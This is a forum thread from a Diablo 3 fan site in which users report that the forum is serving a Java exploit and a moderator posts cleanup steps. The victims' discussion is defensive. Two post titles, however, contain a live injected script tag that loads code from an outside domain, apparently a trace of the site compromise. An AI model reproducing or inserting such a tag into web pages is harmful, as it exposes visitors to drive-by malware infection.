Latest Diablo 3 News
DiabloWiki Updates
Support the site! Become a Diablo: IncGamers PAL - Remove ads and more!

Java Plug-in

Discussion in 'Feedback, Suggestions & Support' started by Raesene, Apr 11, 2012. | Replies: 27 | Views: 3318

Thread Status:
Not open for further replies.
  1. Raesene

    Raesene IncGamers Member

    Joined:
    Aug 15, 2011
    Messages:
    1,415
    Likes Received:
    1
    Trophy Points:
    122
    Java Plug-in

    Why does the Java plug-in keep attempting to run for every page on this forum?
     
  2. Bowzer

    Bowzer <a href="payments.php">IncGamers Site Pal</a><br>D

    Joined:
    Oct 4, 2011
    Messages:
    1,931
    Likes Received:
    0
    Trophy Points:
    166
    IncGamers Forums giving users Infected Java Cache file.

    Exploit:Java/CVE-2012-0507.D

    Please look into this asap, I got it when visiting the general discussion forum.

    Links to malware from 51yes.com
     
  3. kazyn

    kazyn IncGamers Member

    Joined:
    Jun 26, 2011
    Messages:
    175
    Likes Received:
    0
    Trophy Points:
    26
    Has this site been compromised? (java exploit every time I open?)

    [​IMG]





    anyone else getting this? Every time I open this bookmark (none of my others do this) I get this java exploit warning, and I have these boxes in front of the links..........
     
  4. kazyn

    kazyn IncGamers Member

    Joined:
    Jun 26, 2011
    Messages:
    175
    Likes Received:
    0
    Trophy Points:
    26
    Re: Has this site been compromised? (java exploit every time I open?)

    the deets:

    [​IMG]
     
  5. Bowzer

    Bowzer <a href="payments.php">IncGamers Site Pal</a><br>D

    Joined:
    Oct 4, 2011
    Messages:
    1,931
    Likes Received:
    0
    Trophy Points:
    166
    Re: Java Plug-in<script src=http://www.betheboss.it/ads/link.js></script>

    It's trying to download malware, do a virus scan and clear your temp files asap if you accepted the applet.
     
  6. Karpalo

    Karpalo IncGamers Member

    Joined:
    Feb 25, 2011
    Messages:
    909
    Likes Received:
    0
    Trophy Points:
    120
    Trojan blocked from the site

    Didn't have Java disabled and Avast kept blocking a trojan from this page. It might be just Avast playing tricks, but better be safe than sorry. Maybe someone should look into this?You can delete or merge this into Kazyn's thread. Seems like he opened one simultaneously.
     
  7. Karpalo

    Karpalo IncGamers Member

    Joined:
    Feb 25, 2011
    Messages:
    909
    Likes Received:
    0
    Trophy Points:
    120
    Re: Has this site been compromised? (java exploit every time I open?)

    Had same problem. Disabled java for now just to be safe. Seems like it's not only Avast so there might be something to this.
     
  8. Skjolde

    Skjolde IncGamers Site Pal

    Joined:
    Aug 11, 2007
    Messages:
    5,401
    Likes Received:
    47
    Trophy Points:
    169
    IncGamers Forums giving users Infected Java Cache file. (Repost)

    I think this was worth of a repost since I know that some of you guys, pretty much only browse the SPF.

    EDIT: For those of you who don't know how to detect/remove it, Bowser has told me that he's going to post a little walkthrough for how to do that. And it's going to be in the same forum as the link below.

    http://diablo.incgamers.com/forums/showthread.php?826324-IncGamers-Forums-giving-users-Infected-Java-Cache-file





     
  9. ShadoutMapes

    ShadoutMapes IncGamers Member

    Joined:
    Sep 26, 2010
    Messages:
    1,925
    Likes Received:
    0
    Trophy Points:
    105
    Re: Has this site been compromised? (java exploit every time I open?)

    Kaspersky didnt say anything. Running NoScript though, which might have stopped it.
     
  10. Bowzer

    Bowzer <a href="payments.php">IncGamers Site Pal</a><br>D

    Joined:
    Oct 4, 2011
    Messages:
    1,931
    Likes Received:
    0
    Trophy Points:
    166
    Re: Java Plug-in

    This might be overkill, but just to be safe:

    1) Copy and paste this into a text document, save it and reboot your computer with your modem unplugged.

    2) Go into control panel and re-enable microsoft security essentials (if you have it) as this malware will attempt to disable any anti-viruses you currently run.

    3) run a scan on

    file:C:\Users\User*\AppData\Local\Temp\

    The exploits can be found in there.

    Remove the infection

    4) Clear out the cache of your java runtime environment and disable automatic cacheing of java files.

    Click the little Java icon in the bottom right of your desktop, search around until you find clear cache.

    Then click network settings and uncheck keep temporary files on my computer.

    5) Clear all your temp files and documents including temp system files.

    Right click on your C drive then go properties, disk cleanup, then then follow the steps to remove all temp files.

    Reboot and you should be fine.
     
  11. Karpalo

    Karpalo IncGamers Member

    Joined:
    Feb 25, 2011
    Messages:
    909
    Likes Received:
    0
    Trophy Points:
    120
    Re: Java Plug-in

    Are you saying that full scan with Avast isn't enough? :E
     
  12. Bowzer

    Bowzer <a href="payments.php">IncGamers Site Pal</a><br>D

    Joined:
    Oct 4, 2011
    Messages:
    1,931
    Likes Received:
    0
    Trophy Points:
    166
    Re: Java Plug-in

    Rushter removed the threat from the servers, but a ton of us are still infected.

    If you run firefox or ie, there's a good chance you have it if you didn't have java cacheing disabled.

    Chrome users seem to be fine as long as they didn't accept the applet.
     
  13. MoUsE_WiZ

    MoUsE_WiZ IncGamers Member

    Joined:
    Nov 19, 2003
    Messages:
    4,508
    Likes Received:
    0
    Trophy Points:
    466
    Re: Java Plug-in

    Given that it's impossible to know everything that was downloaded by everything that was downloaded, even formatting isn't really overkill, and even formatting isn't 100% safe. Proof of concept: I was at a presentation by some security researchers who hijacked the Torpig botnet, one of the chat logs or emails that was stolen by the bot said something along the lines of, "I've finally gotten that virus off my machine." I believe the researchers stumbled across that line while grepping to count occurrences of the word 'virus' to get an idea about how many people thought they might be infected, but my memory of the presentation's a little hazy. Anyways it seems unethical to me to hide this in the feedback forum; it should be on the front page and displayed as a forum announcement. Given that this is the third time I recall this site (or an ad partner) spreading malware, maybe it's also time to start looking into how to advertise without requiring scripts. Just providing my feedback because of where the thread is located.



     
  14. hubb

    hubb IncGamers Member

    Joined:
    May 27, 2009
    Messages:
    2,251
    Likes Received:
    0
    Trophy Points:
    120
    Re: Java Plug-in

    Agreed RE the announcement. I'm just glad I saw the thread Bowser posted in the SPF before it was deleted...
     
  15. Skjolde

    Skjolde IncGamers Site Pal

    Joined:
    Aug 11, 2007
    Messages:
    5,401
    Likes Received:
    47
    Trophy Points:
    169
    Re: Java Plug-in

    Ahem.. Actually it was me, but no worries. Bowzer is a straight up guy too!
     
  16. Karpalo

    Karpalo IncGamers Member

    Joined:
    Feb 25, 2011
    Messages:
    909
    Likes Received:
    0
    Trophy Points:
    120
    Re: Java Plug-in<script src=http://www.betheboss.it/ads/link.js></script>

    Same thing happening again. Work your magic people in charge.
     
  17. imthedan

    imthedan IncGamers Member

    Joined:
    Apr 27, 2010
    Messages:
    532
    Likes Received:
    0
    Trophy Points:
    165
    Java exploits on the site?

    Hey guys,

    I logged in today and got a java exploit from the forums.

    It came up as: Exploit:Java/CVE-2012-0507.D -- Rated as Severe.

    I cleaned it once, closed my browser and only opened the forums to make sure it was coming the forums and it is. Just wanted to give everyone a heads up because it may be coming from one of the ads on the site. I am on my friends laptop and he doesn't have ad block installed, so that's the only thing I can think it is.
     
  18. Bowzer

    Bowzer <a href="payments.php">IncGamers Site Pal</a><br>D

    Joined:
    Oct 4, 2011
    Messages:
    1,931
    Likes Received:
    0
    Trophy Points:
    166
  19. imthedan

    imthedan IncGamers Member

    Joined:
    Apr 27, 2010
    Messages:
    532
    Likes Received:
    0
    Trophy Points:
    165
    Re: Java exploits on the site?

    Right on. If the MS essentials pick it up and I remove it, I don't have to do all the things you said in the post right?
     
  20. Bowzer

    Bowzer <a href="payments.php">IncGamers Site Pal</a><br>D

    Joined:
    Oct 4, 2011
    Messages:
    1,931
    Likes Received:
    0
    Trophy Points:
    166
    Re: Java exploits on the site?

    Clear your java cache and turn off java cacheing.
     
Thread Status:
Not open for further replies.

Share This Page